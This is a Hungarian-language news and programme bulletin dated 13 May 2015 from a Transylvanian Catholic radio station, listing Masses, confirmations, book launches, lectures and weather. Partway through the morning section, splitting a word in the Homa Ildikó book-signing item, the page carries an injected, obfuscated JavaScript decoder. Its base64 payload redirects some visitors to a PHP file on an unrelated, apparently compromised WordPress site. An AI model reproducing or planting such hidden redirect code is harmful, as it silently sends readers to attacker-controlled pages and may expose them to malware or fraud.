2015. május 13. – Hírek és programajánló

H Í R E K   E S T E
 

Megkezdődött a ferencesek nagykáptalanja
A Kisebb Testvérek Rendjének nagykáptalanja május 11 és június 7. között ülésezik Assisiben. Hagyomány, hogy hatévente a rend bölcsőjének közelében, a Porciunkula-kápolna köré épített Angyalos Boldogasszony-bazilikában, illetve a mellette lévő Domus Pacis ferences vendégházban tartják az új rendi vezetés megválasztásával egybekötött találkozót.
A négy hétig tartó káptalan azért is hasznos, mert így a világ minden részéből érkező ferencesek megismerhetik egymást és a különböző országok, földrészek sajátos helyzetét. Az erdélyi ferenceseket Orbán Szabolcs provinciális képviseli.

Folytatódik a bérmálás a gyergyói főesperesi kerületben
Holnap délelőtt tíz órakor a borszéki templomban 56 fiatal, délután öt órakor Gyergyótölgyesen 39 fiatal részesül Tamás József püspök kézfeltétele által a bérmálás szentségében.

Könyvbemutató Jáki Sándor Teodóz bencés atyáról
Május 14-én, csütörtökön a marosvásárhelyi Szent Imre templomban, az esti szentmise után bemutatják A vándorapostol – Jáki Sándor Teodóz bencés atya emlékezete című könyvet. 
Csíkszeredában pénteken délután öt órától a Corvina könyvesházban várják a könyv iránt érdeklődőket. Szombaton Pusztinában délután négy órakor kerül sor a könyvbemutatóra. 
Mindhárom helyszínen Polgár Tibor András, a kiadás gondozója ismerteti a bencés szerzetesről szóló könyvet.

Áldozócsütörtök napi búcsúk
– A szatmárnémeti székesegyházban holnap este hét órakor, a búcsús szentmise főcelebrása Schönberger Jenő püspök, a szentbeszédet Ulmer Mihály szakaszi plébános mondja.
– Krasznaterebesen holnap délelőtt tizenegy órától tartják a búcsúmisét Istvánfi Szilárd, a Szent Család templom segédlelkésze szentbeszédével. 
– A mócsi templom búcsúját holnap délután három órakor ünneplik. A szentmise szónoka Kádár István kolozsmonostori plébános lesz.
– A kecsetkisfaludi templom búcsúja holnap déli tizenkét órakor kezdődik. A szentmisén Kovács Csaba Antal ferences atya prédikál.
– Kézdialmáson a búcsús szentmise, melyet rádiónk élőben közvetít, holnap déli tizenkét órakor kezdődik. Az ünnepi szentmisén a szentbeszédet Péter Arthur kézdikővári plébános mondja.
– Uzonban este hét órától tartják a búcsús szentmisét.

Katolikus Akadémia Kolozsváron
A Katolikus Akadémián május 14-én, csütörtökön Forrai Tamás jezsuita atya Ima és személyes hívás az ignáci hagyományban címmel tart előadást. Az előadás este hét órakor kezdődik a kolozsvári Római Katolikus Teológia Kar dísztermében.

Szentlélek kilenced Temesváron
Május 15-23. között minden este nyolc órai kezdettel kilencedet tartanak a Szentlélek tiszteletére a józsefvárosi Notre Dame zárdatemplomban. A szentbeszéddel egybekötött imaalkalmat Wonerth László kanonok, temesvár-szabadfalui plébános vezeti.

Családosok Egyházmegyei Találkozója Nagyváradon és Resicabányán
– Május 16-án, szombaton ötödik alkalommal szervezi meg a Nagyváradi Püspökség a Családok Egyházmegyei Találkozóját. A rendezvény kilenc órakor a Püspöki Palota kertjében kezdődik, meghívott előadója Jakabos Barnabás jezsuita atya, témája pedig a családon belüli egyetértés elsajátítása és begyakorlása lesz.
– A resicabányai plébánián, szintén május 16-án szombaton tartják a Temesvári Egyházmegyei Családok találkozóját. A program délelőtt fél tíz órakor kezdődik és délután öt órakor szentmisével ér véget. A gyerekeket és fiatalokat külön program várja. A családos találkozó előadója: Cosmuţa Ovidiu görög katolikus oravicai esperes.

Nagyváradiak a Nagymarosi Ifjúsági Találkozón
Május 16-án, szombaton „Tiszta élet, avagy boldogok a tiszta szívűek, mert meglátják az Istent.” mottóval szervezik meg az idei első Nagymarosi Ifjúsági Találkozót. A találkozó szentmiséjének főcelebránsa és szónoka Böcskei László megyéspüspök lesz. Az egyházmegyét képviseli továbbá Varga Sándor monospetri plébános, hat fiatal kíséretében. 

Szentmise Szent László sírjánál
Május 17-én, a hónap harmadik vasárnapján délután négy órakor a nagyváradi székeskáptalan tagjai esti dicsérettel egybekötött szentmisét végeznek a Kárpát-medence keresztényeinek egykori zarándokhelyén, Szent László király sírjánál. A szentmisét a templom melletti helyiségben tartják, amit a Vár főbejárata felől lehet megközelíteni. A szentmise főcelebránsa és szónoka Májernyik Mihály margittai plébános-kanonok.

Az időjárásról: A hidegfront, amely hazánk fölé érkezett változó felhős időt hozott magával. Holnap hosszabb-rövidebb napos időszakokra is számíthatunk, de kell számítani záporok, zivatarok kialakulására is. Időnként erős, viharos lehet a szél. Pár fokot visszaesik a levegő hőmérséklete, hajnalban 7 és 11 C fok várható, míg napközben 17-21°C-ot mérhetünk. 

MRE – Hírszolgálat, 2015. május 13.

 


H Í R E K   R E G G E L

Jótékonysági árverés Kolozsváron
Magyarország Kolozsvári Főkonzulátusa május 8-án jótékonysági aukciót szervezett a Szent Kamill Szociális Otthon javára, amely 2001 óta működik. Az évek során már több mint 450 rászorulót ápoltak. A rendezvény során az otthon tulajdonában lévő festmények, képzőművészeti alkotások, dísztárgyak kerültek árverésre, amelynek bevételével – összesen 3.670 lejjel – a szociális otthon működését támogatták.

Folytatódik a bérmálás a gyergyói főesperesi kerületben
Ma délelőtt tíz órakor a gyergyóhodosi templomban 36 fiatal, délután öt órakor Orotván 33 fiatal részesül Tamás József püspök kézfeltétele által a bérmálás szentségében.

Ma van a Fatimai Boldogságos Szűz Mária ünnepe
– Az 1917-ben történt fatimai jelenés évfordulóján, ma délelőtt tizenegy órakor tartják Székelyszentlélek filiájában, Bogárfalván a templom búcsúját. Az ünnep szónoka Laczkó Vilmos farkaslaki plébános.
– A nagyváradi székesegyházban ma este hat órakor szentségimádás lesz, nyolc órakor szentmisét mutatnak be, kilenc órától pedig az év első gyertyás körmenetét tartják a Püspöki Palota kertjében. A szentmise főcelebránsa és szónoka Pék Sándor, a nagyvárad-újvárosi Szent László templom plébánosa.
– A nagykárolyi Fatimai Szűz Mária templomban ma este hat órától rózsafüzér imára gyűlnek össze a hívek, majd hét órától tartják az ünnepi, búcsús szentmisét.
– Felhívjuk hallgatóink figyelmét, hogy az erdélyi Mária Rádió a magyarországi Mária Rádió segítségével, ma déli tizenkét órakor élő adásban közvetíti a fatimai kegyhelyről az ünnepi szentmisét, amelybe a nagyváradi vételkörzetben levő hallgatók is bekapcsolódhatnak.

Könyvbemutató Jáki Sándor Teodóz bencés atyáról
Május 14-én, csütörtökön a marosvásárhelyi Szent Imre templomban, az esti szentmise után bemutatják A vándorapostol – Jáki Sándor Teodóz bencés atya emlékezete című könyvet. Csíkszeredában pénteken délután öt órától a Corvina könyvesházban várják a könyv iránt érdeklődőket. Szombaton Pusztinában délután négy órakor kerül sor a könyvbemutatóra. Mindhárom helyszínen Polgár Tibor András, a kiadás gondozója ismerteti a bencés szerzetesről szóló könyvet.

Áldozócsütörtök napi búcsúk
– A szatmárnémeti székesegyházban holnap este hét órakor, a búcsús szentmise főcelebrása Schönberger Jenő püspök, a szentbeszédet Ulmer Mihály szakaszi plébános mondja.

– Krasznaterebesen holnap délelőtt tizenegy órától tartják a búcsúmisét Istvánfi Szilárd, a Szent Család templom segédlelkésze szentbeszédével.
– A mócsi templom búcsúját holnap délután három órakor ünneplik. A szentmise szónoka Kádár István kolozsmonostori plébános lesz.
– A kecsetkisfaludi templom búcsúja holnap déli tizenkét órakor kezdődik. A szentmisén Kovács Csaba Antal ferences atya prédikál.
– Kézdialmáson a búcsús szentmise, melyet rádiónk élőben közvetít, holnap déli tizenkét órakor kezdődik. Az ünnepi szentmisén a szentbeszédet Péter Arthur kézdikővári plébános mondja.
– Uzonban este hét órától tartják a búcsús szentmisét.

Katolikus Akadémia Kolozsváron
A Katolikus Akadémián május 14-én, csütörtökön Forrai Tamás jezsuita Ima és személyes hívás az ignáci hagyományban címmel tart előadást. Az előadás este hét órakor kezdődik a kolozsvári Római Katolikus Teológia Kar dísztermében.

Evangéliumi lélektan – Homa Ildikó Budapesten dedikál
Az idei Szent István Könyvhét keretében május 15-én, pénteken délután négy órától Homa Ildikó szociális testvér és pszichológus, rádiónk önkéntes munkatársa dedikálja a Verbum Keresztény Kulturális Egyesület, valamint a Szent István Társulat gondozásában megjelent könyvét. A könyv a Mária Rádióban elhangzott előadások alapján készült. Szeretettel várják erre az eseményre a keresztény pszichológia iránt érdeklődőket! A kiadvány egész héten megvásárolható Budapesten, a Ferenciek terén naponta reggel kilenc és este hét óra között a Verbum stfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andjánál.

Fülöp kurzus Székelyudvarhelyen
Május 29-31. között Fülöp kurzust szervez a Kis Szent Teréz plébánián, a Forrás közösség a Regnum Christi marosvásárhelyi alapítványal együtt. A Fülöp kurzus Jézusról és az Ő örömhíréről szól, arról, hogy kereszténynek lenni valóban öröm. Jelentkezni május 19-éig lehet, a 0757-636.301-es telefonszámon.

Az időjárásról: Ma egy újabb hidegfront érkezik hazánk fölé s ennek hatására többfelé kialakulhatnak záporok, délutántól nyugat felől zivatarok is. A feltámadó északnyugati szélben 20-25 C fok közötti csúcshőmérsékletre van kilátás.

MRE - Hírszolgálat, 2015. május 13.

About the author

maradmin

Leave a Comment